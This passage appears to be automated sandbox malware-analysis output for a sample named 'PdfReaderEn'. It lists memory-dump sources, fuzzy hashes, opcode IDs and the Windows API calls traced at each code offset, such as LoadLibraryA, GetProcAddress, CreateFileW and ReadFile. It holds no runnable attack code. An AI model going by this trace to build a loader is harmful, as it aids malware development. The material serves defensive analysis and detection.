                                                                                                                                                                                          • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                          • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                                                                                                                          • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                          • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                                                                                                                          • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                                          • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                                                          • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                                                                                                                          • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                                                          • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                                                                                                          • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$AllocFree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3394109436-0
                                                                                                                                                                                          • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                                          • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                                                                                                                          • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                                          • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 310444273-0
                                                                                                                                                                                          • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                          • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                                                                                                          • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                          • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                          • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                                          • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                                          • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                          • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                          • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                          • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                                          • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                                          • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                          • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                                          • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                                          • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4115351271-0
                                                                                                                                                                                          • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                                          • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                                                                                                                          • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                                          • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                          • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                                          • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                                                                                                                                          • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                                          • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                          • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                                          • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                                                                                                                          • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID:
